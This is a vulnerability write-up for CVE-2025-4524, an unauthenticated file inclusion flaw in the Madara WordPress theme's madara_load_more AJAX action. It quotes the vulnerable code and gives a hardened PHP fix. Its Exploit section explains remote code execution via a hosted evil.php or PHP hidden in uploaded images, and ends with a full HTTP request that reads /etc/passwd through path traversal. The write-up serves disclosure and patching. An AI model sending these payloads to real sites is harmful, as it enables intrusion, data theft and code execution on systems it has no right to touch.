CVE-2025-4524 - Unauthenticated madara-core WordPress theme LFI

WordFence link

Description

The Madara theme's madara_load_more AJAX action, registered for both logged-in and anonymous users (wp_ajax_ and wp_ajax_nopriv_), takes a template parameter straight from the request and passes it unvalidated to PHP's include whenever the value contains the string plugins.

Vulnerability


The vulnerable code is as follows:

add_action( 'wp_ajax_madara_load_more', array( $this, 'ajax_load_next_page' ) );
add_action( 'wp_ajax_nopriv_madara_load_more', array( $this, 'ajax_load_next_page' ) );

...

function ajax_load_next_page() {
  ...
  
  if ( $query->have_posts() ) {
    while ( $query->have_posts() ) {
      $query->the_post();
      $madara_loop_index ++;
      set_query_var( 'madara_loop_index', $madara_loop_index );
      
      if ( $madara_loop_index < $posts_per_page + 1 ) {
        if ( ( strpos( $template, 'plugins' ) !== false ) ) {
          include( $template ); // we are in wp-content\themes\madara\app\{plugins} VULN
        } else {
          //$post_format = get_post_format() ? get_post_format : '';
          get_template_part( $template, get_post_format() );
        }
      }
    }

    if ( $query->post_count <= $posts_per_page ) {
      // there are no more posts
      // print a flag to detect
      echo '<div class="invi no-posts"><!-- --></div>';
    }
  } else {
    // no posts found
  }

  /* Restore original Post Data */
  wp_reset_postdata();
  die( '' );
}

On each successful madara_load_more query, the file named by the template parameter is rendered once for every post in the result set. If the string plugins appears anywhere in template, the value is handed to include unchanged; if it does not, WordPress resolves the name itself through get_template_part.

The only check is that substring match, so it can be used to include arbitrary files: either a remote URL such as https://evilsite.com/plugins/evil.php when allow_url_include is enabled, or a local path via traversal. Since the working directory during this action is wp-content/themes/madara/app/ and that directory contains a plugins subdirectory, a value such as plugins/../../../../../wp-content/uploads/evil.png satisfies the check and climbs out of the theme.
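As an added example, not code from the theme or the advisory, this is the containment check the include branch of ajax_load_next_page() is missing: an allowlist on the template syntax followed by a realpath check that the resolved file lives under app/plugins. The function names are assumptions, and $base_dir is assumed to be the absolute path of wp-content/themes/madara/app (get_template_directory() . '/app' inside WordPress); the demo layout at the bottom is constructed in a temporary directory.

```php
<?php
// Added example (not the theme's code): a containment check for the template
// parameter, to run before the include() branch in ajax_load_next_page().
// $base_dir is assumed to be the absolute path of wp-content/themes/madara/app
// (get_template_directory() . '/app' inside WordPress).

// Resolve a user-supplied template name to a real file under $base_dir/plugins,
// or return null when it would not stay inside that directory.
function madara_safe_plugin_template( string $template, string $base_dir ): ?string {
    $plugins_dir = realpath( $base_dir . '/plugins' );
    if ( $plugins_dir === false ) {
        return null;
    }
    // Allowlist the syntax first: optional "plugins/" prefix, then one or more
    // segments of [A-Za-z0-9_-], ending in ".php". This rejects "..", NUL bytes,
    // "://" schemes and absolute paths before any filesystem lookup happens.
    if ( ! preg_match( '#^(?:plugins/)?(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.php\z#', $template ) ) {
        return null;
    }
    $real = realpath( $plugins_dir . '/' . preg_replace( '#^plugins/#', '', $template ) );
    // realpath() resolves symlinks too, so a link pointing outside is caught here.
    if ( $real === false || strpos( $real, $plugins_dir . DIRECTORY_SEPARATOR ) !== 0 ) {
        return null;
    }
    return $real;
}

// Hardened replacement for the `include( $template )` branch: include only a
// resolved, contained path; report false so the caller can fall back or abort.
function madara_include_plugin_template( string $template, string $base_dir ): bool {
    $path = madara_safe_plugin_template( $template, $base_dir );
    if ( $path === null ) {
        return false;
    }
    include $path;
    return true;
}

// Demo on a constructed temporary layout mirroring app/plugins/<name>.php.
$base = sys_get_temp_dir() . '/madara_demo_' . getmypid();
mkdir( "$base/plugins/manga", 0700, true );
file_put_contents( "$base/plugins/manga/item.php", '<?php echo "item\n";' );
var_dump( madara_safe_plugin_template( 'plugins/manga/item.php', $base ) );               // legitimate template
var_dump( madara_safe_plugin_template( 'plugins/../../../../../../etc/passwd', $base ) ); // traversal attempt
var_dump( madara_safe_plugin_template( 'https://evilsite.com/plugins/evil.php', $base ) ); // remote URL
madara_include_plugin_template( 'manga/item.php', $base );
unlink( "$base/plugins/manga/item.php" );
rmdir( "$base/plugins/manga" ); rmdir( "$base/plugins" ); rmdir( $base );
```

In the theme, the else branch of the original check (get_template_part) would remain the fallback when the function returns false.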

Exploit

How this is exploited depends on the allow_url_include PHP setting.

If it is enabled, a malicious actor can set up an HTTP server that replies with a malicious PHP script upon reception of a request whose path contains the string plugins.

If it is disabled, a malicious actor can upload a file containing PHP code (in image EXIF metadata, image pixel data, etc.) through other means on the WordPress instance and include that file. PHP's include treats everything outside <?php ... ?> tags as literal output, so the image bytes are echoed as-is and only the PHP between the tags is executed.

The outcome is local file inclusion and, where PHP code can be placed in an included file, remote code execution.


POST /wp-admin/admin-ajax.php HTTP/2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490

action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail